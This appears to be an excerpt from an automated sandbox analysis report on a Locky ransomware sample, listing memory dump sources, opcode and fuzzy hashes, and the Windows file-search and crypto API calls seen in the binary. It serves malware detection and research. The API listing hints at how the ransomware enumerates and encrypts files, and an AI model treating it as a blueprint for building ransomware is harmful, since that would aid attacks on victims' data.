    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: DefaultInfoLanguageLocaleUser
    • String ID:
    • API String ID: 1127112782-0
    • Opcode ID: 77c10df9341b8774a2eb736014f5f45652b3baed9b0ee050ff7fb9fed571095c
    • Instruction ID: 1ff07d14465ce6d9dc55956dbed75553087b841068d40614c309f807d8d4dc51
    • Opcode Fuzzy Hash: 77c10df9341b8774a2eb736014f5f45652b3baed9b0ee050ff7fb9fed571095c
    • Instruction Fuzzy Hash: 5631273038E134DBC610AA83B440AF5736CAB9B301BF07457944F9B152D7686A0BB65F
    APIs
    • FindClose.KERNEL32(00000000), ref: 0042D5F1
    • FindFirstFileW.KERNEL32(?,?), ref: 0042D656
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: Find$CloseFileFirst
    • String ID:
    • API String ID: 2295610775-0
    • Opcode ID: 53908860698f17e15de53ed4f6d29caf16c60f70080bc57f36c8f5a6c6598218
    • Instruction ID: 577dcde79129a6ee61153fd75f6c2bb51cc275da0b78936f382770e5e21318c2
    • Opcode Fuzzy Hash: 53908860698f17e15de53ed4f6d29caf16c60f70080bc57f36c8f5a6c6598218
    • Instruction Fuzzy Hash: EC216630F8E138EA8A109A50B8589F5736CEB4B305BF16483900F57116C76D5A9BBA9F
    APIs
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004161AE
    • CryptDestroyKey.ADVAPI32(?), ref: 004161C6
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: Crypt$ContextDestroyRelease
    • String ID:
    • API String ID: 1322390979-0
    • Opcode ID: e702adf58ecf47b63cc5522b8f60f95db412c32e62f385bb032d569ce04f4f92
    • Instruction ID: cdf26b9c64b4f428902ed45690c03371e591a226f322e920b625f1b22f5a1a5e
    • Opcode Fuzzy Hash: e702adf58ecf47b63cc5522b8f60f95db412c32e62f385bb032d569ce04f4f92
    • Instruction Fuzzy Hash: 890108316CE164FBC6208A4088045F5737CAB4B3427373917984F96113CB68EECBAA8F
    APIs
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040F93B
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: ContextCryptRelease
    • String ID:
    • API String ID: 829835001-0
    • Opcode ID: 6c642fb519eda613ba863890a13d1c547cb87b2169a0f1f9ffe160fa5c84483b
    • Instruction ID: 6e4aec4b0e0a83204a63aaccff309ed9bb1bb1a7c116baa791c4071c88ce14a3
    • Opcode Fuzzy Hash: 6c642fb519eda613ba863890a13d1c547cb87b2169a0f1f9ffe160fa5c84483b
    • Instruction Fuzzy Hash: 0721F9B228E105FAC230AA548440BF173A8A75B3617316833944BB69D1D3786A4FB69F
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: CryptDestroy
    • String ID:
    • API String ID: 1712904745-0
    • Opcode ID: a10d2a76bd59464141b46457b3db529f7a62428e5765536d098f1bf6d7819110
    • Instruction ID: c0c7bfe2595ef8060a4a4e155666853a8e5e9f072bcf79c585a38e1700e6e6ca
    • Opcode Fuzzy Hash: a10d2a76bd59464141b46457b3db529f7a62428e5765536d098f1bf6d7819110
    • Instruction Fuzzy Hash: 0111263218D205CAC2308A14C4709B1B378AB5A3517712477884B77DC1EB7C3A0FAE8F
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: CryptDestroy
    • String ID:
    • API String ID: 1712904745-0
    • Opcode ID: e83ffd3c92534e19f287c071f76ed0df3d41f0b1140f30bdfbae265de28abceb
    • Instruction ID: 2af0b72134494925e1730cbaf74644c64a28d486fcb1097582cd3abe6359deae
    • Opcode Fuzzy Hash: e83ffd3c92534e19f287c071f76ed0df3d41f0b1140f30bdfbae265de28abceb
    • Instruction Fuzzy Hash: 9BE0B6702CD245DAD6308AA0E8344F5337CA78F3063713572540EB6895CB38794FAD0A
    APIs
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040F8A9
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: ContextCryptRelease
    • String ID:
    • API String ID: 829835001-0
    • Opcode ID: 9f7604a5a8192a20399c6435b30381e6faaf6432f8dc9890e3c7ed4cac82aa71
    • Instruction ID: a0f8be43c6ea17bafec26e26e2ff13ab93a8fbf406d37cefdd9f3e4632e034cc
    • Opcode Fuzzy Hash: 9f7604a5a8192a20399c6435b30381e6faaf6432f8dc9890e3c7ed4cac82aa71
    • Instruction Fuzzy Hash: D3E0B63324D101DAE230BA508488AF02328AB46310B74E473940B79DD5D37C558FA51F
    APIs
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040F8A9
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: ContextCryptRelease
    • String ID:
    • API String ID: 829835001-0
    • Opcode ID: f8ca6ea56645b4b15fcc466af053545b534d41412953f6de13a9c8c595e638b9
    • Instruction ID: 6b2d96a1ac39bc7434f81dd66a2358c585f75223a442eabf2f856613dff42d85
    • Opcode Fuzzy Hash: f8ca6ea56645b4b15fcc466af053545b534d41412953f6de13a9c8c595e638b9
    • Instruction Fuzzy Hash: 3BD0623319D505DAD534EA4094445F03329A75B301BA5E473C40E69D95D37C154EA51B
    APIs
    • SetSecurityDescriptorDacl.ADVAPI32 ref: 004198FA
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: DaclDescriptorSecurity
    • String ID:
    • API String ID: 368980482-0
    • Opcode ID: b8aabb4657d526885dba57dbed7850d1b9e1530fda39b01ce78759744d36f6fa
    • Instruction ID: 7cbef6061d2df6491523fde19351ed95174e1d8bbff04b3909f72ac667912731
    • Opcode Fuzzy Hash: b8aabb4657d526885dba57dbed7850d1b9e1530fda39b01ce78759744d36f6fa
    • Instruction Fuzzy Hash: 7ED0C9301ED102DA8114DE0494784F2732DAF5B3513313846C01F6A1918B792ECBA65E
    APIs
    • AllocateAndInitializeSid.ADVAPI32 ref: 00419962
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: AllocateInitialize
    • String ID:
    • API String ID: 220217950-0
    • Opcode ID: 648c4d91e8fba088d0b4779e384e2025b530f5cdf5f4572d2509f544e9d3ac2a
    • Instruction ID: 2a2b24405af3c8e1d3deade641f75fe88f150d36fb72bd0a18cc332f025aa5fb
    • Opcode Fuzzy Hash: 648c4d91e8fba088d0b4779e384e2025b530f5cdf5f4572d2509f544e9d3ac2a
    • Instruction Fuzzy Hash: BEC002B05AD108CAD740DF9080A84F4B72CAA1F3467A0745EC00F5521297381A8AEA1B
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: Version
    • String ID:
    • API String ID: 1889659487-0
    • Opcode ID: a438c98748b4986ea1805951891a6c4e46f0228f110199421cb1eb8a736f0aef
    • Instruction ID: dac310d86b8c0015b18cf2360a63935645e9bb2d1dcb880b441697b1dff75bcf
    • Opcode Fuzzy Hash: a438c98748b4986ea1805951891a6c4e46f0228f110199421cb1eb8a736f0aef
    • Instruction Fuzzy Hash: FEA002F42AD1A2C7C9446F11785C876677CE6563437E07936A1CB96851CB1C0E43651E
    APIs
    • CryptReleaseContext.ADVAPI32 ref: 004193D8
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: ContextCryptRelease
    • String ID:
    • API String ID: 829835001-0
    • Opcode ID: 378f132dc5927113c7b8179bccebd0ed11ae8a2058cd9fe2403676ad9aa72da1
    • Instruction ID: 0a93bc24fba2eab863b12168a2458b22ae8f548d34dea66537af81962f5bf6d4
    • Opcode Fuzzy Hash: 378f132dc5927113c7b8179bccebd0ed11ae8a2058cd9fe2403676ad9aa72da1
    • Instruction Fuzzy Hash: 1EA002350CD444EA81280B115C2C4F535BDA65B756326342BE81FC09594F381DDF655E
    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00005EC6), ref: 00405F0D
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: f8330fde41944224e193f67afc6cc16d993e35fb32822d660fcf56c4b13b140b
    • Instruction ID: f024cff4287d4bf44263ee6ec9f0a9f10823e1ee2ca6573980b22611895fe8ea
    • Opcode Fuzzy Hash: f8330fde41944224e193f67afc6cc16d993e35fb32822d660fcf56c4b13b140b
    • Instruction Fuzzy Hash: C79002B02A1A0086864027749D0D6072AA0DA586177A108756045E4194DF7881469959
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: CreateInstance
    • String ID:
    • API String ID: 542301482-0
    • Opcode ID: ea4d4a68d56fb357ec32c0393e0744c9017ac68711543bc46e52ea342fe44e31
    • Instruction ID: 435566210d79d3c25084ce6b1cccf0afc57128ea6fb01bb8d070ec23f3dca18c
    • Opcode Fuzzy Hash: ea4d4a68d56fb357ec32c0393e0744c9017ac68711543bc46e52ea342fe44e31
    • Instruction Fuzzy Hash:
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID:
    • String ID: N@
    • API String ID: 0-1509896676
    • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
    • Instruction ID: c1686b08318381e129178c9fe2bba932ff1ec08a115dc8d019638c05c9233651
    • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
    • Instruction Fuzzy Hash: 3E6117719003158FCB18CF49C49469EBBA2FF84314F2AC5BED8096B3A2C7B59955CBC8
    Memory Dump Source
    • Source File: 00000000.00000002.2442653732.0000000000690000.00000040.00000020.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_690000_LockyRansom.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fdcacacdc00313ccb8ee3fe0694b325b006cea537a284d02c1b417a35e84ad11
    • Instruction ID: 2a0ff11ffc66d7c7834fdc3671ae0ba50ecfbac40b3d35c85555e37606334ebc
    • Opcode Fuzzy Hash: fdcacacdc00313ccb8ee3fe0694b325b006cea537a284d02c1b417a35e84ad11
    • Instruction Fuzzy Hash: 5A418372100104EFEF50EF58C845EAAB7AEEF84724B25451DF80597B12C771EC42CBA4
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
    • Instruction ID: 0989f8679564657a94d75670a29f3e5bc62fdd8ba82d2e08f4d30ee6f724cbb3
    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
    • Instruction Fuzzy Hash: 33117D7720004243D615863DDBBC6BBE39AFBC532476C837BD8416B7D4D2BEEA459908
    Memory Dump Source
    • Source File: 00000000.00000002.2442653732.0000000000690000.00000040.00000020.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_690000_LockyRansom.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
    • Instruction ID: 1d81f476b733d0b43d4220e814000faadb41cd3f1387b8520e11976a2769abfc
    • Opcode Fuzzy Hash: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
    • Instruction Fuzzy Hash: 02E0E231100044CFDF9A9F20D950690BBB6FB58729F38C8ADA8025A6A2CB76C963DE00
    Memory Dump Source
    • Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
    • Instruction ID: 7d24b00bc07c04ef41814a5a6730787244e6255f9bebe18d54b9fc0054544f40
    • Opcode Fuzzy Hash: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
    • Instruction Fuzzy Hash: B3E0EC31100044CFCF5D9F50D994B51BB62FB48329F34D8AD94025A1D2C776C953CE00
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2e3264ce0374d2910ace50dfbec309423fade262f275f8ce23c757caaf87853f
    • Instruction ID: 072e47c4920cc5aec20cf316f301896d0833a00b56cdd122c8161bd88124dfea
    • Opcode Fuzzy Hash: 2e3264ce0374d2910ace50dfbec309423fade262f275f8ce23c757caaf87853f
    • Instruction Fuzzy Hash: 46B012D0C4C016EAC300CF8048C09F0639D450F3881702173680F310C2923C100F711F
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00402B94), ref: 00403D7C
    • __mtterm.LIBCMT ref: 00403D88
      • Part of subcall function 00403AC1: TlsFree.KERNEL32(00000015,00403EEA,?,00402B94), ref: 00403AEC
      • Part of subcall function 00403AC1: DeleteCriticalSection.KERNEL32(00000000,00000000,Function_0006DE10,?,00403EEA,?,00402B94), ref: 00406968
      • Part of subcall function 00403AC1: _free.LIBCMT ref: 0040696B
      • Part of subcall function 00403AC1: DeleteCriticalSection.KERNEL32(00000015,Function_0006DE10,?,00403EEA,?,00402B94), ref: 00406992
    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00403D9E
    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00403DAB
    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00403DB8
    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00403DC5
    • TlsAlloc.KERNEL32(?,00402B94), ref: 00403E15
    • TlsSetValue.KERNEL32(00000000,?,00402B94), ref: 00403E30
    • __init_pointers.LIBCMT ref: 00403E3A
    • __calloc_crt.LIBCMT ref: 00403EA8
    • GetCurrentThreadId.KERNEL32 ref: 00403ED4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
    • API String ID: 4163708885-3819984048
    • Opcode ID: 4312e2d89dab64fa0104fb7ac2644e61afca37bc80ed00e98ce8477f12054ac2
    • Instruction ID: 8b888edff67a3ad70612f4db2fe864331e61a9c68ef0f356476727beb791fc7b
    • Opcode Fuzzy Hash: 4312e2d89dab64fa0104fb7ac2644e61afca37bc80ed00e98ce8477f12054ac2
    • Instruction Fuzzy Hash: 52316F359412119FC721AF75AC0965F3EACEB44366B14493FE408A22F1FB78A582CF8C
    APIs
    • _ValidateScopeTableHandlers.LIBCMT ref: 00405C81
    • __FindPESection.LIBCMT ref: 00405C9B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: FindHandlersScopeSectionTableValidate
    • String ID: L"H$L"H$L"H$P"H
    • API String ID: 876702719-989293535
    • Opcode ID: ec60c86e5f064fd136c6facc0da41a19ef79b1499b8fa922a0b60d688d53f1d9
    • Instruction ID: a4a187f7893baabdcc40696e7cee2dbda72870aac3330e258b1bf9c816fb411f
    • Opcode Fuzzy Hash: ec60c86e5f064fd136c6facc0da41a19ef79b1499b8fa922a0b60d688d53f1d9
    • Instruction Fuzzy Hash: EF919F31A00A158BCB14CB58DE84A6FB7B5EB84314F19867ED815A73E0E779BD01CF98
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0047D118,00000008,00403C06,00000000,00000000,?,?,00403C33,?,00403993,?,?,?,?,004014DA), ref: 00403B0F
    • __lock.LIBCMT ref: 00403B43
      • Part of subcall function 00406A7B: __mtinitlocknum.LIBCMT ref: 00406A91
      • Part of subcall function 00406A7B: __amsg_exit.LIBCMT ref: 00406A9D
      • Part of subcall function 00406A7B: EnterCriticalSection.KERNEL32(?,?,?,00403B48,0000000D), ref: 00406AA5
    • InterlockedIncrement.KERNEL32(0047F0C0), ref: 00403B50
    • __lock.LIBCMT ref: 00403B64
    • ___addlocaleref.LIBCMT ref: 00403B82
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
